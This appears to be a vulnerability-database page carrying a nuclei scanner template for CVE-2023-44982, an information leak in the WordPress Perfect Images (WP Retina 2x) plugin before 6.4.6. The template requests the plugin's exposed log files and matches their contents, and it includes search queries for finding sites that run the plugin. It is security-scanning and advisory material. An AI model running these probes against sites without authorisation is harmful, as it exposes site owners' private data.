Lucene search
K

WordPress Perfect Images (WP Retina 2x) < 6.4.6 - Sensitive Information Exposure

🗓️ 07 Jul 2026 03:01:27Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 17 Views

WordPress Perfect Images WP Retina 2x up to 6.4.5 exposes sensitive data via logs; update to 6.4.6.

Related
Refs
Code
id: CVE-2023-44982

info:
  name: WordPress Perfect Images (WP Retina 2x) < 6.4.6 - Sensitive Information Exposure
  author: pussycat0x
  severity: medium
  description: |
    Jordy Meow Perfect Images (Manage Image Sizes, Thumbnails, Replace, Retina) versions up to 6.4.5 contain a vulnerability that exposes sensitive information to unauthorized actors, letting attackers access confidential data, exploit requires no specific conditions.
  impact: |
    Unauthorized actors can access sensitive information, leading to privacy breaches and potential data misuse.
  remediation: |
    Update to version 6.4.6 or later.
  reference:
    - https://wpscan.com/vulnerability/aba0c4a1-e253-4b5b-b46d-239567567b16/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2023-44982
    cwe-id: CWE-200
    epss-score: 0.01437
    epss-percentile: 0.69934
  metadata:
    verified: true
    max-request: 3
    vendor: meowapps
    product: perfect-images
    framework: wordpress
    publicwww-query: "/wp-content/plugins/wp-retina-2x/"
    fofa-query: body="/wp-content/plugins/wp-retina-2x/"
  tags: cve,cve2023,wordpress,wp-plugin,wp-retina-2x

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/wp-retina-2x/classes/wp-retina-2x.log"
      - "{{BaseURL}}/wp-content/uploads/wp-retina-2x.log"
      - "{{BaseURL}}/wp-content/uploads/wp-retina-2x-logs.txt"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "RETINA"
          - "PATH"
          - "thumbnail"
          - "wp-content"
          - "Full-Size"
          - "uploads"
        condition: and

      - type: regex
        part: body
        regex:
          - '\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}:'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100a92ba8a6f62f18525fecd8103cbd9c01e2eaeea6b0d5113c0f72b6ca5ead4f8502201c93b2625394269abd931f50f6691d073dbe85cbd3a31a0735e69fa07c9d8fa0:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Feb 2026 09:14Current
7High risk
Vulners AI Score7
CVSS 3.15.3 - 7.5
EPSS0.01437
17